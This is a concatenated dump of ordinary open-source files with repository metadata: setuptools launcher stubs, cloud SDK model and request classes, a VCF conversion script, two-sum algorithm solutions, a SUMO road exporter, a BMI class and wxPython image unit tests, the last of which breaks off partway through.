604cfc5c9093bc10e7a5f34c490d2d20c3543182 | f6d7107e390c35ae998f9d9904c6012515629204 | /env/bin/easy_install-2.7 | b4cb105bdb98b033e5fbf5f4fa7be50d05bfa417 | [] | no_license | theresa-clare/movie-ratings | c066c15991b13a540ad569c040a460834ee5059e | b0e80c728b2396272063b468452e61386315aa56 | refs/heads/master | 2021-01-19T18:07:44.026831 | 2015-05-08T00:05:22 | 2015-05-08T00:05:22 | 35,049,616 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | 7 | #!/home/user/src/ratings/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | |
a96d0e6cbfbb17f69233e6f6c4998a16fd37cf02 | 187a6558f3c7cb6234164677a2bda2e73c26eaaf | /jdcloud_sdk/services/antipro/models/Acl.py | 7832071a16e817c78df10dbe5d03f5fb05ad3d38 | [
"Apache-2.0"
] | permissive | jdcloud-api/jdcloud-sdk-python | 4d2db584acc2620b7a866af82d21658cdd7cc227 | 3d1c50ed9117304d3b77a21babe899f939ae91cd | refs/heads/master | 2023-09-04T02:51:08.335168 | 2023-08-30T12:00:25 | 2023-08-30T12:00:25 | 126,276,169 | 18 | 36 | Apache-2.0 | 2023-09-07T06:54:49 | 2018-03-22T03:47:02 | Python | UTF-8 | Python | false | false | 2,979 | py | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
class Acl(object):
def __init__(self, id=None, priority=None, sipType=None, sip=None, sipIpSetId=None, sipIpSetName=None, dipType=None, dip=None, dipIpSetId=None, dipIpSetName=None, protocol=None, portType=None, port=None, portSetId=None, portSetName=None, action=None, enable=None, remark=None):
"""
:param id: (Optional) 访问控制规则 Id
:param priority: (Optional) 规则优先级
:param sipType: (Optional) 源IP类型: 0: IP, 1: IP地址库
:param sip: (Optional) 源IP, sipType 为 0 时有效, 否则为空
:param sipIpSetId: (Optional) IP地址库 Id, sipType 为 1 时有效, 否则为空。<br>'-1' IP高防回源地址<br>'-2' Web应用防火墙回源地址
:param sipIpSetName: (Optional) IP地址库名称
:param dipType: (Optional) 目的IP类型: 0: IP, 1: IP地址库
:param dip: (Optional) 目的IP, dipType 为 0 时有效, 否则为空
:param dipIpSetId: (Optional) IP地址库 Id, dipType 为 1 时有效, 否则为空。<br>'-1' IP高防回源地址<br>'-2' Web应用防火墙回源地址
:param dipIpSetName: (Optional) IP地址库名称
:param protocol: (Optional) 协议类型: 支持 All Traffic, TCP, UDP, ICMP
:param portType: (Optional) 端口类型: 0: IP, 1: 端口库
:param port: (Optional) 端口或端口范围, portType 为 0 时有效,否则为空
:param portSetId: (Optional) 端口库Id, portType 为 1 时有效,否则为空
:param portSetName: (Optional) 端口库名称
:param action: (Optional) 动作: 0: 放行, 1: 阻断
:param enable: (Optional) 规则状态: 0: 关闭, 1: 打开
:param remark: (Optional) 备注
"""
self.id = id
self.priority = priority
self.sipType = sipType
self.sip = sip
self.sipIpSetId = sipIpSetId
self.sipIpSetName = sipIpSetName
self.dipType = dipType
self.dip = dip
self.dipIpSetId = dipIpSetId
self.dipIpSetName = dipIpSetName
self.protocol = protocol
self.portType = portType
self.port = port
self.portSetId = portSetId
self.portSetName = portSetName
self.action = action
self.enable = enable
self.remark = remark
| [
"[email protected]"
] | |
d22cefe991498827063e4959c075dfb148945e3f | 853d2dab299c6644056edfdab7f6cd734076e615 | /aliyun-python-sdk-cdn/aliyunsdkcdn/request/v20141111/StartCdnDomainRequest.py | 1fe98d6791628ce234d8637704254071ec620071 | [
"Apache-2.0"
] | permissive | ahlfors/aliyun-openapi-python-sdk | b231d970444efdd44f74cfb6309e0d807e7a9d99 | 002f457788d7ed7f7ebdfaf908a7cc442b66498e | refs/heads/master | 2021-01-02T22:56:04.359010 | 2017-08-04T06:36:47 | 2017-08-04T06:36:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,512 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class StartCdnDomainRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Cdn', '2014-11-11', 'StartCdnDomain','None')
def get_SecurityToken(self):
return self.get_query_params().get('SecurityToken')
def set_SecurityToken(self,SecurityToken):
self.add_query_param('SecurityToken',SecurityToken)
def get_DomainName(self):
return self.get_query_params().get('DomainName')
def set_DomainName(self,DomainName):
self.add_query_param('DomainName',DomainName)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId) | [
"[email protected]"
] | |
cd6a20e990cb2dbee4a8386d99bf84e07bae879e | 98bd2625dbcc955deb007a07129cce8b9edb3c79 | /vcf2SelectHapStatsInput.py | cc27f18f4a524c23fd3541a1cbad9fa9ac27e99a | [] | no_license | melanieabrams/bremdata | 70d0a374ab5dff32f6d9bbe0a3959a617a90ffa8 | df7a12c72a29cca4760333445fafe55bb6e40247 | refs/heads/master | 2021-12-26T01:57:25.684288 | 2021-09-30T22:48:05 | 2021-09-30T22:48:05 | 166,273,567 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,175 | py | import os
import vcf
import sys
##USGAGE: python vcf2SelectHapStatsInput.py gvcf_filename
##NOTE: this script assumes gVCF formatting, as generated by GATK. It handles missing data as missing.
##PARAMETERS
samples_to_exclude=[] # for 1011 genomes (all pop)
heterozygous_present=True # True for 1011 genomes S cerevisiae
##RUN
def main():
missing_data={} #samples with uncalled variant positions
samples_tested=""
num_samples_tested=0
##
with open(outfile_name,"w") as wf:
vcf_reader = vcf.Reader(open(vcf_filename, 'r'))
for record in vcf_reader:
pos_line=""
pos=record.POS
pos_line+=str(pos)
for call in record.samples:
sample=call.sample
if sample not in samples_to_exclude:
if sample not in samples_tested:
samples_tested+=sample+", "
num_samples_tested+=1
if call.gt_type!=None and call.gt_bases!=None:
allele=call.gt_bases
if heterozygous_present==True:
bases=allele.split('/')
if bases[0]!=bases[1]:
allele='.' # represent heterozygous GT as dots
else:
allele=bases[0] #if homozygous, represent GT as the base
if len(allele)>1:
allele = 'INDEL'
else:
allele='None'
if sample in missing_data:
missing_data[sample]+=','+str(pos)
else:
missing_data[sample]=str(pos)
pos_line+=","+str(allele)
if 'INDEL' not in pos_line and 'None' not in pos_line:
wf.writelines(pos_line+"\n") #omit lines with missing data
## print(pos_line)
## exit() #break for speediness
with open(errfile_name,"w") as wf:
wf.writelines("the following samples were excluded")
wf.writelines("%s," % sample for sample in samples_to_exclude)
wf.writelines("shs input generated for the following"+str(num_samples_tested)+"samples\n")
wf.writelines(samples_tested+"\n")
wf.writelines("sample\tuncalled_pos\n")
for sample in missing_data:
wf.writelines(sample+"\t"+missing_data[sample]+"\n")
if __name__ == '__main__':
vcf_filename=sys.argv[1]
outfile_name=vcf_filename.split('.')[0]+".shsinput"
errfile_name=vcf_filename.split('.')[0]+".missing_call_log"
main()
| [
"[email protected]"
] | |
ebec731334511b25ef15e389dd83a5ec4e2d6dea | 9998f1b6008b290ef1ef895bc0c4ca273dfbe1e0 | /leet code/002-Two Sum.py | 8be38348c0937606c72f279e23b69bb43af0b139 | [
"MIT"
] | permissive | boisde/Greed_Island | 51a997dc0e7890ea468c448bc1dda34e61a4aea8 | 9c4f0195fb7bfaeb6c29e8e9638c7b0ffd9ad90b | refs/heads/master | 2021-06-15T06:58:35.036706 | 2021-04-12T11:14:54 | 2021-04-12T11:14:54 | 20,638,183 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,983 | py | #coding=utf-8
"""
Given an array of integers, find two numbers such that they add up to a specific target number.
The function twoSum should return indices of the two numbers such that they add up to the target,
where index1 must be less than index2.
Please note that your returned answers (both index1 and index2) are not zero-based.
You may assume that each input would have exactly one solution.
Input: numbers={2, 7, 11, 15}, target=9
Output: index1=1, index2=2
"""
class Solution(object):
@staticmethod
def two_sum_n_squared(numbers, target):
# brute force method
N = len(numbers)
for i in range(N):
for j in range(N):
if numbers[i]+numbers[j] == target and i != j:
# don't forget the parenthesis, or will report compile error with
# "too many values to unpack"
smaller, bigger = (i+1, j+1) if i+1 < j+1 else (j+1, i+1)
return smaller, bigger
@staticmethod
def two_sum_n(numbers, target):
N = len(numbers)
num_dict = {}
for i in range(N):
num_dict[numbers[i]] = i
for i in range(N):
to_find = target - numbers[i]
# remember to rule self out
if to_find in num_dict and num_dict[to_find] != i:
smaller, bigger = i+1, num_dict[to_find] + 1
smaller, bigger = (smaller, bigger) if smaller<bigger else (bigger, smaller)
return smaller, bigger
return -1, -1
@staticmethod
def two_sum_n_refined(num, target):
num_dict = {}
for i in range(len(num)):
partner = target - num[i]
# no need to rule self out here, cause you won't encounter yourself again.
if partner in num_dict:
# 1) by the time find your partner, you are already in dictionary,
# and you are always the prior one.
# 2) no need to deal with duplicates, duplicates that is solution to <target> will
# be properly handled; not part of solution, the value of the <num_dict> will be
# the later duplication's index, but that does not matter.
return num_dict[partner]+1, i+1
else:
num_dict[num[i]] = i
return -1, -1
"""
Follow up Question:
What if the given input is already sorted in ascending order?
"""
@staticmethod
# Input: num is sorted
def two_sum_2_nlogn(num, target):
import bisect
N = len(num)
for i in range(N):
partner = target - num[i]
insertion_point = bisect.bisect_left(num, partner)
# use binary search, if found it; rule self out
if insertion_point != N and num[insertion_point] == partner and i != insertion_point:
smaller = i+1
bigger = insertion_point + 1
smaller, bigger = (smaller, bigger) if smaller<bigger else (bigger, smaller)
return smaller, bigger
return -1, -1
@staticmethod
# Input: num is sorted
def two_sum_2_n_refined(num, target):
N = len(num)
prior, later = 0, N-1
# two pointer pointing to ith and jth elements, num[i] and num[j],
# num[i]+num[j] can only be >,<,== target.
for _ in range(N-1):
if num[prior] + num[later] == target:
return prior+1, later+1
elif num[prior] + num[later] > target:
later -= 1
else:
prior += 1
return -1, -1
class TwoSum(object):
"""
Follow up Question: [HARDER--much more details to consider]
Design and implement a TwoSum class. It should support the following operations: add
and find.
add(input) – Add the number input to an internal data structure.
find(value) – Find if there exists any pair of numbers which sum is equal to the value.
For example,
add(1); add(3); add(5); find(4) true; find(7) false
"""
def __init__(self):
self.numbers = {} # <key=number value>: <value=1-based index, could be list if duplicate>
self.count = 1
# store input into a hash map, handle duplicates carefully
def add_constant_runtime(self, x):
# if duplicated and still not a list, change the value to a list.
# Do NOT re-list it!!!
if x in self.numbers and type(self.numbers[x]) is int:
self.numbers[x] = [self.numbers[x]]
self.numbers[x].append(self.count)
elif x in self.numbers:
self.numbers[x].append(self.count)
else:
self.numbers[x] = self.count
self.count += 1
# find target-num[i] in hash map
def find_n_runtime(self, target):
for elem in self.numbers.iterkeys():
partner = target - elem
# edge case: duplicates adds up to target
if partner == elem and partner in self.numbers and type(self.numbers[elem]) is list:
return self.numbers[elem][0], self.numbers[elem][1]
# normal case: found it.
if partner in self.numbers:
if type(self.numbers[elem]) is int:
prior = self.numbers[elem]
else:
prior = self.numbers[elem][0]
if type(self.numbers[partner]) is int:
later = self.numbers[partner]
else:
later = self.numbers[partner][0]
return (prior, later) if prior<later else (later, prior)
return -1, -1
if __name__ == "__main__":
print Solution.two_sum_n_refined([3,2,4], 6) # (2,3)
print Solution.two_sum_n_refined([3,2,2], 4) # (2,3)
print Solution.two_sum_n_refined([3,2,2,2,2,2,2,2,2,2,2,2,2,2], 4) # (2,3)
print Solution.two_sum_n_refined([3], 4) # (-1,-1)
# for follow up question 2, with input num array already sorted in ascending order
print Solution.two_sum_2_nlogn([2,3,4], 6) # (1,3)
print Solution.two_sum_2_nlogn([2,2,3], 4) # (1,2), should not be (1,1)
print Solution.two_sum_2_nlogn([2,2,2,2,2,2,2,2,2,2,2,2,3], 4) # (1,2)
print Solution.two_sum_2_nlogn([3], 4) # (-1,-1)
print Solution.two_sum_2_n_refined([2,3,4], 6) # (1,3)
print Solution.two_sum_2_n_refined([2,2,3], 4) # (1,2), should not be (1,1)
print Solution.two_sum_2_n_refined([2,2,2,2,2,2,2,2,2,2,2,2,3], 4) # (1,2)
print Solution.two_sum_2_n_refined([3], 4) # (-1,-1)
# for follow up question 3: data structure design
two_sum = TwoSum()
for i in [2,3,4]:
two_sum.add_constant_runtime(i)
print two_sum.find_n_runtime(6) # (1,3)
for i in [2,2,2,2,2,2,2,2,2,2,2,2,3]:
two_sum.add_constant_runtime(i)
print two_sum.find_n_runtime(4) # (1,4)
for i in [4]:
two_sum.add_constant_runtime(i)
print two_sum.find_n_runtime(14) # (-1,-1) | [
"[email protected]"
] | |
5f9e775a7ab8bd1de57638ea892c2b7c8c3e3e6a | c838b0eaf08c63284bd29442f8a0a297d1558fd5 | /lagom/policies/random_policy.py | e19f315de4d7b034ecb4e8bf785077ab607fc0a3 | [
"MIT"
] | permissive | vin136/lagom | ccd0f4a3e469c1ee8ef88b1f5248e712b51c5704 | 54e1890e6450f4b1bf499a838963c5d1a3b2da6a | refs/heads/master | 2020-04-22T21:45:51.488458 | 2019-02-13T16:41:32 | 2019-02-13T16:41:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,077 | py | from .base_policy import BasePolicy
class RandomPolicy(BasePolicy):
r"""Random policy.
The action is uniformly sampled from action space.
Example::
policy = RandomPolicy(config=None, env_spec=env_spec, device=None)
policy(observation)
"""
def __init__(self, config, env_spec):
self.config = config
self._env_spec = env_spec
def make_networks(self, config):
pass
def make_optimizer(self, config, **kwargs):
pass
def optimizer_step(self, config, **kwargs):
pass
def reset(self, config, **kwargs):
pass
def __call__(self, x, out_keys=['action'], **kwargs):
out_policy = {}
if self.env_spec.is_vec_env:
action = [self.action_space.sample() for _ in range(self.env_spec.env.num_env)]
else:
action = self.action_space.sample()
out_policy['action'] = action
return out_policy
@property
def recurrent(self):
pass
| [
"[email protected]"
] | |
ba9ca47753df3cc1fa8c8a864a4387c6a3a2f322 | 9a26d98f6f531b222c332ab6367e9e18beb0633f | /008. Dynamic Programming [동적 프로그래밍]/venv/Scripts/easy_install-3.8-script.py | 31936c0e1b179dcf18187893df7efb9e2d4ed4f9 | [] | no_license | yoonicode/of-Algorithms | dffac0b422e51dcd7df1f60236675608af73f03d | bbf89df443a3561fbbe0d0f6dfebb97f3ed216aa | refs/heads/master | 2022-11-24T08:27:52.679469 | 2020-07-28T14:58:52 | 2020-07-28T14:58:52 | null | 0 | 0 | null | null | null | null | UHC | Python | false | false | 523 | py | #!"D:\Users\Yoonsung\Documents\GitHub\of-Algorithms\008. Dynamic Programming [동적 프로그래밍]\venv\Scripts\python.exe" -x
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.8'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.8')()
)
| [
"[email protected]"
] | |
5489c893e687e6aed670cc7fdcc9bf6a16248996 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5640146288377856_1/Python/StefanPochmann/A.py | 854b3312bd1dba6383f564157857729276cad94e | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | #f = open('A.in')
#def input():
# return next(f)
for x in range(1, int(input()) + 1):
R, C, W = map(int, input().split())
#print(R, C, W)
print('Case #%d:' % x, W + (C-1) // W + (R-1) * (C // W))
| [
"[email protected]"
] | |
e3bf180b1c85b33e05c07e36ed9b8cbfe6534857 | 309d17b81cea038713ba67bee72a41d2df4d6869 | /Python/Python_basic/Python_OOP/OOP6_bmi.py | d2e2087aa8b93b01272764517ec6df4319cee4a3 | [] | no_license | Bongkot-Kladklaen/Programming_tutorial_code | ac07e39da2bce396e670611884436b360536cdc5 | cda7508c15c3e3d179c64b9aac163b6173ef3519 | refs/heads/master | 2023-06-20T13:14:17.077809 | 2021-07-18T04:41:04 | 2021-07-18T04:41:04 | 387,081,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | class Bmi:
def __init__(self,w_kg, h_cm):
self.w_kg = w_kg
self.h_cm = h_cm
def bmi(self):
return self.w_kg / (self.h_cm / 100) ** 2
def category(self):
diag = ""
if self.bmi() < 18.5:
diag = "ต่ำกว่าเกณฑ์"
elif 18.5 <= self.bmi() <= 25:
diag = "ตามเกณฑ์"
elif 25 < self.bmi() <= 30:
diag = "เกินเกณฑ์"
elif self.bmi() > 30:
diag = "อ้วน"
return diag
def __str__(self):
return f"BMI = {self.bmi()} ({self.category()})"
if __name__ == "__main__":
a = Bmi(50,164)
print(a) | [
"[email protected]"
] | |
291ec277badd9ec84ba46368670827ec4adfb1db | 4da55187c399730f13c5705686f4b9af5d957a3f | /resources/sumo_exporter/road.py | f3fe5331d6efe9f5434c28093515462058cc516f | [
"Apache-2.0"
] | permissive | Ewenwan/webots | 7111c5587100cf35a9993ab923b39b9e364e680a | 6b7b773d20359a4bcf29ad07384c5cf4698d86d3 | refs/heads/master | 2020-04-17T00:23:54.404153 | 2019-01-16T13:58:12 | 2019-01-16T13:58:12 | 166,048,591 | 2 | 0 | Apache-2.0 | 2019-01-16T13:53:50 | 2019-01-16T13:53:50 | null | UTF-8 | Python | false | false | 7,356 | py | """Road class container."""
import math
import re
from re_definitions import floatRE, intRE
from data_structures import grouper
from math_utils import apply_spline_subdivison_to_path
from shapely.geometry import LineString, MultiLineString
from lxml import etree as ET
class Road(object):
"""Class matching with a Webots Road, containing facilities to export to SUMO edges."""
roads = []
def __init__(self, wbtString, roadType):
"""Constructor: Extract info from the wbtString matching the node."""
self.startJunction = None
self.endJunction = None
self.roadType = roadType
try:
self.id = re.findall(r'id\s*"([^"]*)"', wbtString)[0]
except:
self.id = ""
try:
self.width = float(re.findall(r'width\s*(%s)' % floatRE, wbtString)[0])
except:
self.width = 7
try:
self.speedLimit = float(re.findall(r'speedLimit\s*(%s)' % floatRE, wbtString)[0])
except:
self.speedLimit = 50.0 / 3.6 # 50 km/h
try:
self.translation = [float(x) for x in re.findall(r'translation\s*(%s\s*%s\s*%s)' % (floatRE, floatRE, floatRE), wbtString)[0].split()]
except:
self.translation = [0.0, 0.0, 0.0]
try:
self.rotation = [float(x) for x in re.findall(r'rotation\s*(%s\s*%s\s*%s\s*%s)' % (floatRE, floatRE, floatRE, floatRE), wbtString)[0].split()]
except:
self.rotation = [0.0, 1.0, 0.0, 0.0]
try:
self.startJunctionID = re.findall(r'startJunction\s*"([^"]*)"', wbtString)[0]
except:
self.startJunctionID = ""
try:
self.endJunctionID = re.findall(r'endJunction\s*"([^"]*)"', wbtString)[0]
except:
self.endJunctionID = ""
if self.roadType == 'Road':
try:
self.wayPoints = grouper(3, [float(x) for x in re.findall(r'wayPoints\s*\[([^\]]*)\]', wbtString)[0].split()])
except:
self.wayPoints = []
splineSubdivision = 4
try:
splineSubdivision = int(re.findall(r'splineSubdivision\s*(%s)' % intRE, wbtString)[0])
except:
splineSubdivision = 4
if splineSubdivision > 0:
self.wayPoints = apply_spline_subdivison_to_path(self.wayPoints, splineSubdivision)
elif self.roadType == 'StraightRoadSegment':
length = 10.0
try:
length = float(re.findall(r'length\s*(%s)' % floatRE, wbtString)[0])
except:
length = 10.0
self.wayPoints = [[0, 0, 0], [0, 0, length]]
elif self.roadType == 'CurvedRoadSegment':
self.wayPoints = []
subdivision = 8
try:
subdivision = int(re.findall(r'subdivision\s*(%s)' % intRE, wbtString)[0])
except:
subdivision = 8
curvatureRadius = 10.0
try:
curvatureRadius = float(re.findall(r'curvatureRadius\s*(%s)' % floatRE, wbtString)[0])
except:
curvatureRadius = 10.0
totalAngle = 1.5708
try:
totalAngle = float(re.findall(r'totalAngle\s*(%s)' % floatRE, wbtString)[0])
except:
totalAngle = 1.5708
for i in range(subdivision + 1):
x1 = curvatureRadius * math.cos(float(i) * totalAngle / float(subdivision))
y1 = curvatureRadius * math.sin(float(i) * totalAngle / float(subdivision))
self.wayPoints.append([x1, 0, y1])
else:
self.wayPoints = []
try:
self.lanes = int(re.findall(r'numberOfLanes\s*(%s)' % intRE, wbtString)[0])
except:
self.lanes = 2
try:
self.forwardLanes = int(re.findall(r'numberOfForwardLanes\s*(%s)' % intRE, wbtString)[0])
except:
self.forwardLanes = 1
self.backwardLanes = self.lanes - self.forwardLanes
self.oneWay = self.backwardLanes == 0
if self.rotation[0] < 0.01 and self.rotation[2] < 0.01:
angle = self.rotation[3]
if self.rotation[1] > 0:
angle = -angle
for i in range(len(self.wayPoints)):
wayPoint = self.wayPoints[i]
x = math.cos(angle) * wayPoint[0] - math.sin(angle) * wayPoint[2]
y = wayPoint[1]
z = math.cos(angle) * wayPoint[2] + math.sin(angle) * wayPoint[0]
self.wayPoints[i] = [x, y, z]
else:
print ('Warning: cannot export edge "%s" because the road is rotated not only along axis Y.' % self.id)
def create_edge(self, edges):
"""Create the SUMO edge XML node(s) matching with the Webots road."""
if self.startJunctionID == self.endJunctionID:
print ('Warning: cannot export edge "%s" because start and end junctions are identical.' % self.id)
return
if len(self.wayPoints) < 2:
print ('Warning: cannot export edge "%s" because it has less than 2 way-points.' % self.id)
return
laneWidth = self.width / self.lanes
# The original path should be slightly shifted if the case where the
# forwardLanes and backwardLanes are not matching.
originalCoords = [[- x - self.translation[0], z + self.translation[2]] for [x, y, z] in self.wayPoints]
originalLineString = LineString(originalCoords)
if self.oneWay:
originalLineString = originalLineString.parallel_offset(0.5 * laneWidth * self.forwardLanes, 'left')
else:
offset = (self.forwardLanes - self.backwardLanes) * laneWidth * 0.5
if offset > 0.0:
originalLineString = originalLineString.parallel_offset(offset, 'left')
elif offset < 0.0:
originalLineString = originalLineString.parallel_offset(offset, 'left')
originalLineString = LineString(list(originalLineString.coords[::-1]))
if isinstance(originalLineString, MultiLineString):
originalPath = originalCoords
else:
originalPath = list(originalLineString.coords)
# Create the forward edge
if self.forwardLanes > 0:
edge = ET.SubElement(edges, 'edge')
edge.attrib['id'] = self.id
edge.attrib['from'] = self.startJunctionID
edge.attrib['to'] = self.endJunctionID
edge.attrib['numLanes'] = str(self.forwardLanes)
edge.attrib['width'] = str(laneWidth)
edge.attrib['shape'] = Road._pathToString(originalPath)
# Create the backward edge
if self.backwardLanes > 0:
edge = ET.SubElement(edges, 'edge')
edge.attrib['id'] = '-' + self.id
edge.attrib['to'] = self.startJunctionID
edge.attrib['from'] = self.endJunctionID
edge.attrib['numLanes'] = str(self.backwardLanes)
edge.attrib['width'] = str(laneWidth)
edge.attrib['shape'] = Road._pathToString(originalPath[::-1])
@classmethod
def _pathToString(cls, path):
s = ""
for coord in path:
s += "%f,%f " % (coord[0], coord[1])
return s
| [
"[email protected]"
] | |
d42fbc0d64ddce99c3a42871b69a726c42be38af | f8580d2c963b6a3c34e918e0743d0a503a9584bd | /unittests/test_image.py | eb9bc49d20574689e5249f2e3d79f96497b3d369 | [] | no_license | pypy/wxpython-cffi | f59c3faeed26e6a26d0c87f4f659f93e5366af28 | 877b7e6c1b5880517456f1960db370e4bb7f5c90 | refs/heads/master | 2023-07-08T21:13:22.765786 | 2016-12-02T22:10:45 | 2016-12-02T22:10:45 | 397,124,697 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,280 | py | import imp_unittest, unittest
import wtc
import wx
import wx.lib.six as six
from wx.lib.six import BytesIO as FileLikeObject
import os
pngFile = os.path.join(os.path.dirname(__file__), 'toucan.png')
#---------------------------------------------------------------------------
def makeBuf(w, h, bpp=1, init=0):
"Make a simple buffer for testing with"
buf = bytearray([init] * (w*h*bpp))
return buf
class image_Tests(wtc.WidgetTestCase):
def test_imageCtor1(self):
img = wx.Image()
self.assertTrue(not img.IsOk())
img.Create(100,100)
self.assertTrue(img.IsOk())
def test_imageCtor2(self):
img = wx.Image(100,100)
self.assertTrue(img.IsOk())
def test_imageCtor3(self):
img = wx.Image(wx.Size(100,100))
self.assertTrue(img.IsOk())
img = wx.Image((100,100))
self.assertTrue(img.IsOk())
def test_imageCtor4(self):
w = h = 10
buf = makeBuf(w,h,3)
img = wx.Image(w, h, buf)
self.assertTrue(img.IsOk())
def test_imageCtor5(self):
w = h = 10
buf = makeBuf(w,h,3)
alpha = makeBuf(w,h)
img = wx.Image(w, h, buf, alpha)
self.assertTrue(img.IsOk())
def test_imageCtor4b(self):
w = h = 10
buf = makeBuf(w,h,3)
img = wx.Image((w, h), buf)
self.assertTrue(img.IsOk())
def test_imageCtor4c(self):
w = h = 10
buf = makeBuf(w,h,3)
with self.assertRaises(ValueError):
# should be an exception here because the buffer is the wrong size
img = wx.Image((w, h+1), buf)
def test_imageCtor5b(self):
w = h = 10
buf = makeBuf(w,h,3)
alpha = makeBuf(w,h)
img = wx.Image((w, h), buf, alpha)
self.assertTrue(img.IsOk())
def test_imageCtor6(self):
img = wx.Image(pngFile, wx.BITMAP_TYPE_PNG)
self.assertTrue(img.IsOk())
def test_imageCtor7(self):
img = wx.Image(pngFile, 'image/png')
self.assertTrue(img.IsOk())
def test_imageCtor8(self):
with open(pngFile, 'rb') as f:
data = f.read()
stream = FileLikeObject(data)
img = wx.Image(stream, wx.BITMAP_TYPE_PNG)
self.assertTrue(img.IsOk())
def test_imageCtor9(self):
with open(pngFile, 'rb') as f:
data = f.read()
stream = FileLikeObject(data)
img = wx.Image(stream, 'image/png')
self.assertTrue(img.IsOk())
def test_imageSetData1(self):
w = h = 10
img = wx.Image(w,h)
buf = makeBuf(w,h,3, init=2)
img.SetData(buf)
self.assertTrue(img.IsOk())
self.assertTrue(img.GetRed(1,1) == 2)
def test_imageSetData2(self):
w = h = 10
img = wx.Image(1,1)
buf = makeBuf(w,h,3, init=2)
img.SetData(buf, w, h)
self.assertTrue(img.IsOk())
self.assertTrue(img.GetRed(1,1) == 2)
def test_imageSetAlpha1(self):
w = h = 10
img = wx.Image(w,h)
buf = makeBuf(w,h, init=2)
img.SetAlpha(buf)
self.assertTrue(img.IsOk())
self.assertTrue(img.GetRed(1,1) == 0)
self.assertTrue(img.GetAlpha(1,1) == 2)
def test_imageGetData(self):
img = wx.Image(pngFile)
data = img.GetData()
self.assertEqual(len(data), img.Width * img.Height * 3)
self.assertTrue(isinstance(data, bytearray))
def test_imageGetAlpha(self):
img = wx.Image(pngFile)
data = img.GetAlpha()
self.assertEqual(len(data), img.Width * img.Height)
self.assertTrue(isinstance(data, bytearray))
def test_imageGetDataBuffer(self):
w = h = 10
img = wx.Image(w, h)
self.assertTrue(img.IsOk())
data = img.GetDataBuffer()
self.assertTrue(isinstance(data, memoryview))
data[0] = 1 if six.PY33 else b'\1'
data[1] = 2 if six.PY33 else b'\2'
data[2] = 3 if six.PY33 else b'\3'
self.assertEqual(1, img.GetRed(0,0))
self.assertEqual(2, img.GetGreen(0,0))
self.assertEqual(3, img.GetBlue(0,0))
def test_imageGetAlphaDataBuffer(self):
w = h = 10
img = wx.Image(w, h)
img.InitAlpha()
self.assertTrue(img.IsOk())
data = img.GetAlphaBuffer()
self.assertTrue(isinstance(data, memoryview))
data[0] = 1 if six.PY33 else b'\1'
data[1] = 2 if six.PY33 else b'\2'
data[2] = 3 if six.PY33 else b'\3'
self.assertEqual(1, img.GetAlpha(0,0))
self.assertEqual(2, img.GetAlpha(1,0))
self.assertEqual(3, img.GetAlpha(2,0))
def test_imageSetDataBuffer1(self):
w = h = 10
img = wx.Image(w,h)
buf = makeBuf(w,h,3)
img.SetDataBuffer(buf)
buf[0] = 1
buf[1] = 2
buf[2] = 3
self.assertEqual(1, img.GetRed(0,0))
self.assertEqual(2, img.GetGreen(0,0))
self.assertEqual(3, img.GetBlue(0,0))
def test_imageSetDataBuffer2(self):
w = h = 10
img = wx.Image(1,1)
buf = makeBuf(w,h,3)
img.SetDataBuffer(buf, w, h)
buf[0] = 1
buf[1] = 2
buf[2] = 3
self.assertEqual(1, img.GetRed(0,0))
self.assertEqual(2, img.GetGreen(0,0))
self.assertEqual(3, img.GetBlue(0,0))
def test_imageSetAlphaBuffer(self):
w = h = 10
img = wx.Image(w,h)
buf = makeBuf(w,h)
img.SetAlphaBuffer(buf)
buf[0] = 1
buf[1] = 2
buf[2] = 3
self.assertEqual(1, img.GetAlpha(0,0))
self.assertEqual(2, img.GetAlpha(1,0))
self.assertEqual(3, img.GetAlpha(2,0))
def test_imageNestedClasses(self):
rgb = wx.Image.RGBValue(1,2,3)
self.assertEqual(rgb.red, 1)
self.assertEqual(rgb.green, 2)
